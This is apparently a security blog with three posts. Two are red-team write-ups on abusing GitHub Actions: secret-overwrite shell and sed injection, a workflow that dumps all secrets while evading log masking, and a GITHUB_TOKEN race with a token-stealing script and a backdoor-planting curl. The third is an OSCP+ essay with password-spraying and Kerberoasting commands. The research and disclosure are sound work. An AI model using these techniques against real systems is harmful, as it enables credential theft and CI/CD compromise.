GitHub Actions Secrets: Your New Favorite Red Team Primitive

  • Anyone with write access to a repo can overwrite any secret, including environment secrets protected by required reviewers
  • Passing secrets through environment variables only protects against shell injection, not YAML injection, jq injection, CRLF, or other downstream parsing issues
  • Use GitHub Actions secrets as a Swiss Army knife when attacking CI/CD pipelines; their opacity makes detection and response much more challenging

This post is a collaboration between nopcorn and me.

GitHub Actions secrets are encrypted variables designed to store sensitive information like API keys, tokens, and credentials. Their core premise is straightforward: once you set a secret, its value is hidden from all GitHub interfaces. You cannot read it back through the UI, the CLI, or the API, and repository administrators can’t retrieve a secret’s plaintext value after it has been stored. GitHub encrypts secrets using libsodium sealed boxes before they even reach GitHub’s servers, and the values are only decrypted at runtime when injected into a workflow.

This sounds great. And to be fair, the encryption and access control mechanisms are solid. The problem isn’t with how secrets are stored, but rather with how they are used, who can modify them, and what the documentation doesn’t adequately warn defenders about.

The GitHub documentation on secrets has a few significant blind spots that, taken together, create real opportunities for attackers during red team engagements. Their design as unauditable values also provides avenues for dodging defenders. This post walks through those blind spots and shows how to leverage them when attacking GitHub Actions.

Secrets for Shell Injection

GitHub’s security hardening guide states:

Any user with write access to your repository has read access to all secrets configured in your repository.

The docs are a bit misleading. Here “read access” means users with write access can list secret names. But the statement undersells the actual risk: users with write access can also overwrite secret values. The REST API for Actions secrets requires only collaborator access to create or update secrets, and the Using Secrets documentation confirms that you need write access to create secrets for an organization repository. GitHub has confirmed this as intentional behavior, and there is a long-standing docs issue about the confusing way it is documented.

In most organizations, write access is extremely common. Nearly every developer on a team has push permissions to at least some repositories. There is no separate permission for “can modify secrets” versus “can push code.” If you can push a branch, you can overwrite a secret.

The surprising part is that this applies to protected environment secrets too. You might assume that environments with required reviewers are protected from this kind of tampering. They are not. Required reviewers gate workflow execution only. The API endpoint for creating or updating environment secrets has the same permission requirement as repository secrets. No additional approval step, no reviewer notification. An attacker with write access can overwrite a production environment secret via gh secret set SECRET_NAME --env production, and the next time a legitimate deployment is approved by a reviewer, the poisoned value gets used.

If a workflow interpolates a secret directly into a run step, an attacker with write access can overwrite that secret with a value containing shell metacharacters and get arbitrary code running on the workflow runner.

The obvious problem is noise. Blindly overwriting a secret you don’t know the value of will almost certainly break the pipeline, trigger an investigation, and announce your presence. That might be acceptable for a smash-and-grab, but there will be consequences.

Consider this vulnerable workflow step:

- name: Deploy to production
  run: |
    echo "${{ secrets.SSH_PRIVATE_KEY }}" > /tmp/deploy_key
    chmod 600 /tmp/deploy_key
    ssh -i /tmp/deploy_key -o StrictHostKeyChecking=no deploy@prod.example.com "deploy_script.sh"

The direct interpolation of SSH_PRIVATE_KEY makes this vulnerable to shell injection. But to exploit it cleanly, we first need to know the secret’s current value so we can preserve it in our payload. That means we need to figure out where the secret lives: is it an organization secret, a repository secret, or an environment secret? The answer determines whether we can read the original value and whether we can override it at a different scope.

gh secret list --org <org>
gh secret list --repo <org>/<repo>
gh secret list --repo <org>/<repo> --env <env>

Assuming it is an organization secret, we can dump its value by pushing a throwaway workflow to a feature branch. Organization secrets are passed to all workflows in repositories that have access to them, regardless of whether any job explicitly references the secret by name.

# .github/workflows/malicious.yaml (pushed to a feature branch)
name: debug
on: push
jobs:
  dump:
    runs-on: ubuntu-latest
    steps:
      - name: nothing to see here
        run: echo '${{ toJSON(secrets) }}' | base64 | base64 # bypass log masking

This writes all available secrets to the workflow logs and bypasses GitHub’s secret masking. In a real engagement you would blend the workflow name and step names into something ordinary, and you would probably exfiltrate the values to a server you control rather than leaving them in the logs.

Now that you know the real value, you can exploit the secret context hierarchy to inject a poisoned value without disrupting other repositories. GitHub resolves secret name collisions using a fixed priority order: environment secrets take precedence over repository secrets, which take precedence over organization secrets. If the same secret name exists at multiple levels, the most specific scope wins.

This means you can shadow a broadly-scoped secret by creating one at a narrower scope. Set a repository-level secret with the same name as the organization secret, and only that repo picks up the poisoned value. Every other repo continues using the original. Delete the repository secret when you’re done and the organization secret takes effect again, with no trace at the organization level.

The same principle applies one level deeper. If a workflow uses environment secrets, you can shadow a repository secret by setting an environment secret with the same name. The workflow job that references that environment will use your value; jobs that don’t reference the environment will still see the original.
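
A minimal sketch, assuming the repository has an environment named production:

# shadow the repository-level secret for the production environment only
gh secret set SSH_PRIVATE_KEY --repo <org>/<repo> --env production --body "<poisoned value>"

# remove the shadow when finished; the repository secret takes effect again
gh secret delete SSH_PRIVATE_KEY --repo <org>/<repo> --env production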

In this case, we set a repo secret to override the org secret and successfully take over the pipeline:

gh secret set SSH_PRIVATE_KEY --repo <org>/<repo> \
  --body "<real_SSH_PRIVATE_KEY_value>\" > /tmp/deploy_key; <injection payload>; #"

The pipeline still works. The SSH key is still valid. And your payload runs alongside it. When you are done, delete the repository secret and the original organization secret takes effect again.

Injection Beyond the Shell

Sure, just don’t write vulnerable workflows and you’re fine. Right?

GitHub has an entire dedicated page on script injections in the context of Actions workflows. It does a decent job of explaining how untrusted input from contexts like github.event.pull_request.title can lead to command injection when interpolated into run steps. The recommended mitigation is to pass values through environment variables rather than directly interpolating expressions. This is good advice. The shell treats the variable as a string, not as executable code.
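
For reference, the safe pattern from that guidance looks roughly like this (a minimal sketch of a step in a pull_request-triggered workflow):

- name: Check PR title safely
  env:
    TITLE: ${{ github.event.pull_request.title }}
  run: |
    echo "PR title: $TITLE"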

But shell injection is not the only injection technique. Secrets get passed to all kinds of programs in a typical CI/CD pipeline, and many of those programs have their own interpretation of special characters. An environment variable stops the shell from expanding metacharacters. It does nothing to stop the receiving program from interpreting the secret’s contents in dangerous ways.

This shifts the attacker’s goal. Instead of exploiting a workflow that already exists, the aim is to get a workflow change merged that looks benign but is exploitable through a poisoned secret.

Consider a PR that adds a step like this:

- name: Add API key to local config
  env:
    API_KEY: ${{ secrets.API_KEY }}
  run: |
    sed "s/PLACEHOLDER_API_KEY/$API_KEY/" settings.conf

This looks fine. The secret is loaded as an environment variable, so shell injection is off the table. It uses sed to drop a sensitive API key into a settings file. A reviewer who has read GitHub’s guidance on secrets will see the env block, nod approvingly, and hit approve.

The problem is that sed has its own injection surface. GNU sed’s e command executes arbitrary shell commands from within a sed script (and the related e flag to the s command executes the pattern space as a command). A poisoned secret like:

gh secret set API_KEY --body "<actual_api_key>/;e (cmd1 && cmd2) > /dev/null;#"

will cause the sed command to execute cmd1 and cmd2 on the runner without breaking the pipeline, assuming you were able to leak the original secret value as described earlier. The API key still ends up in the config file. The build still passes.

A reviewer would need to be intimately familiar with the parsing behavior of every program that touches a secret to catch something like this. Realistically, nobody outside of offensive security is thinking about sed command execution flags during code review. The combination of opaque secret values and non-obvious injection surfaces makes this a reliable way to slip malicious workflow changes past a reviewer who is doing everything GitHub tells them to do.

A Note on Disclosure

All of the techniques in this post rely on documented, intentional behavior. Write access allowing secret modification is confirmed as by-design. Direct interpolation of secrets into shell commands is possible by design (the docs recommend against it, but do not prevent it). Secret values being opaque and unauditable is the entire point of the feature. There is nothing here to disclose to GitHub, because none of it is a bug. It is the logical consequence of design decisions that are individually reasonable but collectively create a trust model that attackers can exploit.

Takeaways

GitHub Actions secrets do exactly what they promise: they store values securely and prevent them from being read back through GitHub’s interfaces. The encryption is real, the access controls work as documented, and the log redaction is a thoughtful defense-in-depth measure.

The problem is that these same properties create assumptions. Developers assume that because a value comes from an encrypted store, it is safe to interpolate and requires higher permissions to modify. Reviewers assume that because they have followed GitHub’s guidance, non-shell-based injection isn’t something to worry about. And everyone assumes that environment protection rules protect the environment’s secrets from tampering, when they only protect against unauthorized consumption.

None of these assumptions hold up under adversarial pressure. For red teamers, secrets are a versatile tool that provides injection vectors, social engineering aids for bypassing code review, and an invisible storage mechanism for payloads.

GITHUB_TOKEN Isn’t That Ephemeral

  • GITHUB_TOKEN is an ephemeral (cough) API key that workflows use to authenticate to the GitHub API
  • If you leak the token and make it available before the end of the workflow run, bad things can happen
  • GitHub states that the token is destroyed at the end of a workflow run, but it isn’t immediately invalidated
  • You can race GitHub’s invalidation process for fun and profit

Every time a GitHub Actions workflow is triggered, GitHub automatically provisions a token called GITHUB_TOKEN. This ephemeral credential allows jobs in the workflow to authenticate to the GitHub API without requiring manually managed secrets or personal access tokens. The token is injected into the workflow environment and is scoped to the repository context in which the workflow is running.

The GITHUB_TOKEN starts with one of two default permission sets (permissive or restricted), and these permissions can be customized at the workflow or job level. Job-level scoping is preferred because it gives fine-grained control over access.
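
For example, a minimal sketch of job-level scoping (the job and release script names are illustrative):

permissions: {}            # default for the whole workflow: no API access

jobs:
  release:
    runs-on: ubuntu-latest
    permissions:
      contents: write      # only this job's GITHUB_TOKEN may write repository contents
    steps:
      - uses: actions/checkout@v4
      - run: ./release.sh  # hypothetical release script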

Dude where’s my token

Despite the ephemeral nature of GITHUB_TOKEN, misuse or mishandling during the workflow execution window can expose projects to significant risk. Many teams assume that temporary credentials are inherently safe, but this assumption breaks down in environments where artifacts, logs, or third-party actions introduce uncontrolled surfaces.

One of the most overlooked issues with GITHUB_TOKENs comes from a subtle behavior in actions/upload-artifact@v4. In this version, artifacts become downloadable as soon as they’re uploaded, even if the workflow that created them is still running. This creates a narrow but potent attack window: if the artifact contains a copy of the GITHUB_TOKEN, an attacker can retrieve it and execute arbitrary API calls in the context of the job until the workflow terminates.
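
A sketch of the kind of workflow that opens this window (illustrative, not the exact PoC):

name: build
on: push
jobs:
  package:
    runs-on: ubuntu-latest
    steps:
      - name: Bundle debug info (accidentally including the token)
        run: echo "${{ secrets.GITHUB_TOKEN }}" > secret-file
      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: secret-file
          path: secret-file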

That said, most workflows that upload artifacts tend to do it at the very end. So, in theory, there shouldn’t be much of a window for an attacker to abuse the GITHUB_TOKEN, right? The workflow usually wraps up right after the upload, which should invalidate the token almost immediately. Right? Right!?

Use after free (ish)

While the official documentation states that the GITHUB_TOKEN is revoked immediately after the workflow ends, we discovered that this isn’t strictly true…


During a series of tests conducted in collaboration with my research partner nopcorn, we observed that the token often remains valid for a short period (typically between one and two seconds) after the workflow reports as completed. In other words, the revocation process is not instantaneous. This creates a brief but real post-execution window during which a previously retrieved token can still be used to interact with the GitHub API.

We confirmed the race by setting up a dummy vulnerable workflow in nopcorn/artifact-exploit-poc that purposefully writes the GITHUB_TOKEN to an artifact using actions/upload-artifact@v4. We then used a script to manually kick off the workflow, monitor for the artifact, download it, extract the value of GITHUB_TOKEN, and use it to authenticate to the GitHub API out of band for as long as it remained valid. Afterwards we compared timestamps:

$ python exploit.py --repo nopcorn/artifact-exploit-poc --polling-interval 0.5
[*] Manually triggering the workflow to start...
[*] Waiting for the workflow run to be detected...
[+] Active workflow run found! Run ID: 15263730946, Status: queued
[*] Waiting for run 15263730946 for artifact 'secret-file'...
[*] Downloading artifact secret-file...
[+] Successfully extracted GITHUB_TOKEN from the artifact -> ghs_PsmNtQuBpes3u9x8MxQx22gE6C7Oc42QTsLj
[+] Monitoring GITHUB_TOKEN validity...
[+] 2025-05-27T00:01:42.289469Z: Valid GITHUB_TOKEN! (status code 200)
[+] 2025-05-27T00:01:42.980345Z: Valid GITHUB_TOKEN! (status code 200)
[+] 2025-05-27T00:01:43.668557Z: Valid GITHUB_TOKEN! (status code 200)
[+] 2025-05-27T00:01:44.360745Z: Valid GITHUB_TOKEN! (status code 200)
[+] 2025-05-27T00:01:45.023419Z: Valid GITHUB_TOKEN! (status code 200)
[+] 2025-05-27T00:01:45.688257Z: Valid GITHUB_TOKEN! (status code 200)
[+] 2025-05-27T00:01:46.353344Z: Valid GITHUB_TOKEN! (status code 200)
[+] 2025-05-27T00:01:47.046626Z: Valid GITHUB_TOKEN! (status code 200)
[+] 2025-05-27T00:01:47.754317Z: Valid GITHUB_TOKEN! (status code 200)
[!] 2025-05-27T00:01:48.423765Z: Invalid GITHUB_TOKEN: Bad credentials

Looking at the raw run logs for the workflow, the run ends around 2025-05-27T00:01:46, but we are able to use the GITHUB_TOKEN successfully until at least 2025-05-27T00:01:47, a full second later. That doesn’t sound like much, but there are several techniques a threat actor could use to compromise a repository with only a single API call.
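
For example, a single PUT to the contents API (the file path and payload here are hypothetical) is enough to plant a backdoored build script, provided the leaked token still carries contents: write permissions:

# $STOLEN_TOKEN holds the value extracted from the artifact
curl -s -X PUT \
  -H "Authorization: Bearer $STOLEN_TOKEN" \
  -H "Accept: application/vnd.github+json" \
  "https://api.github.com/repos/<org>/<repo>/contents/scripts/build.sh" \
  -d '{"message":"ci: tweak build script","content":"<base64-encoded payload>","sha":"<current file sha>"}'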

While this is a contrived example, a scan of public GitHub repositories using Sourcegraph shows the pattern is more common than you might think.

Disclosure

We responsibly disclosed this finding to GitHub through their vulnerability reporting program on HackerOne. The issue was triaged and investigated over the course of a month. Ultimately, however, GitHub classified the behavior as “informational” and chose not to pursue it further. Their position was that since the token is eventually revoked, the brief extension does not constitute a vulnerability under their current threat model.

While we respect their decision, it underscores a philosophical gap between how ephemeral secrets are documented and how they behave in practice. For red teamers, this matters. If you can automate artifact retrieval and parse secrets before the revocation race completes, you have a viable short-term credential to pivot or persist.
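
A rough sketch of that automation in shell, assuming the target workflow writes the token into an artifact named secret-file as in the PoC above, and that gh is already authenticated for the polling itself:

# grab the newest run of the target repository
RUN_ID=$(gh run list --repo <org>/<repo> --limit 1 --json databaseId --jq '.[0].databaseId')

# poll until the artifact becomes downloadable mid-run
until gh run download "$RUN_ID" --repo <org>/<repo> -n secret-file -D loot 2>/dev/null; do
  sleep 0.5
done
TOKEN=$(cat loot/secret-file)

# keep using the token until GitHub's delayed revocation kicks in
while curl -sf -H "Authorization: Bearer $TOKEN" https://api.github.com/rate_limit >/dev/null; do
  date -u; sleep 0.5
done
echo "token invalidated"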

We approached many of the vulnerable projects we identified during our scans (via bug bounty programs and GitHub security disclosures), and we’re happy to say that the vast majority took the report seriously and promptly fixed their vulnerable repositories.


Assume Breach, Not Burnout: The New OSCP+ Experience

Like many in the cybersecurity community, I once viewed the OSCP certification as the gatekeeper to many offensive security roles. But for me, it was more than a technical exam; it became a recurring roadblock. I failed the older version of the OSCP twice before finally passing it with a bit of luck. When the OSCP+ was released, I decided to attempt it because I wanted to see if I was up for a “more realistic” challenge.

I’m sharing this story because something changed recently. Offensive Security released the revamped OSCP+, and after diving into this new version, I found something that finally clicked. Here’s what’s different—and why it made all the difference for me.

Enter OSCP+: A Modernized, Realistic Challenge

Coming from a red teaming background, I’ve spent a lot of time inside Active Directory environments, abusing domain misconfigurations, and simulating adversarial behavior across enterprise networks.

Trying Harder

So when I first attempted the original OSCP, I expected a challenge—but not one so disconnected from my daily work. The exam and lab environments were overwhelmingly web-heavy, with a strong emphasis on outdated Linux boxes and classic web application vulnerabilities.

More Windows, More Realism

One of the biggest changes was the increased number of Windows machines, especially in the lab and exam environments. In the real world, most of what I see revolves around Windows and Active Directory—not outdated Linux web servers vulnerable to simple exploits. The OSCP+ lab now reflects this reality.

This shift made all the difference for me. Tools like PowerView, BloodHound, and Mimikatz were no longer an afterthought; they were central to the experience. Finally, the skills I use in real engagements were the same ones I needed to succeed in the exam.

Assumed Breach for Active Directory

Another welcome surprise: the Active Directory section starts with an assumed breach. Instead of spending half the exam time just trying to land a basic foothold, I was dropped into a compromised workstation within a corporate domain.

This approach let me focus on lateral movement, privilege escalation, and domain dominance—more like the average network pentesting assessment. It also made the exam more strategic and realistic, instead of being a time sink filled with outdated enumeration.

No Bonus Points, No Gimmicks

One of the most notable changes in the OSCP+ exam is the updated point structure.

In the older version of the OSCP, there were bonus points: if you completed a certain number of exercises and lab machines from the course material, you could earn up to 10 extra points on the exam. In practice, it encouraged people to take shortcuts and complete only the minimum number of exercises and lab machines required for the bonus.

With OSCP+, bonus points are gone; you know exactly what’s needed to pass. Instead of banking on a few extra points, the focus is on demonstrating real-world offensive skills during the exam itself. It shifts the mindset from “padding my score” to “executing a plan.”

What I Did Differently

With OSCP+, I trained like I was prepping for a real engagement:

  • Completed EVERY SINGLE PWK exercise and practice machine
  • Mapped out attack paths across multi-host Windows environments with BloodHound
  • Practiced with NetExec, the all-in-one tool for Kerberoasting, password spraying, domain enumeration, and pretty much everything else (a few example commands are below)
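
A few illustrative NetExec one-liners (host names, wordlists, and flags are examples; check them against your nxc version):

nxc smb 10.10.10.0/24 -u users.txt -p 'Winter2025!' --continue-on-success          # password spray
nxc ldap dc01.corp.local -u svc_account -p 'Passw0rd!' --kerberoasting kerb.txt    # Kerberoast
nxc ldap dc01.corp.local -u svc_account -p 'Passw0rd!' --users                     # enumerate domain users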

Final Thoughts: It’s Still Hard, But It’s Fair

To be clear, OSCP+ is no walk in the park. It still demands hours of focused practice, deep technical knowledge, and solid methodology. But the difference now is that the challenge aligns with reality.

If you’ve struggled with the old OSCP—especially if you’re coming from a Windows-heavy or red team background—don’t give up. The new OSCP+ might be exactly what you need.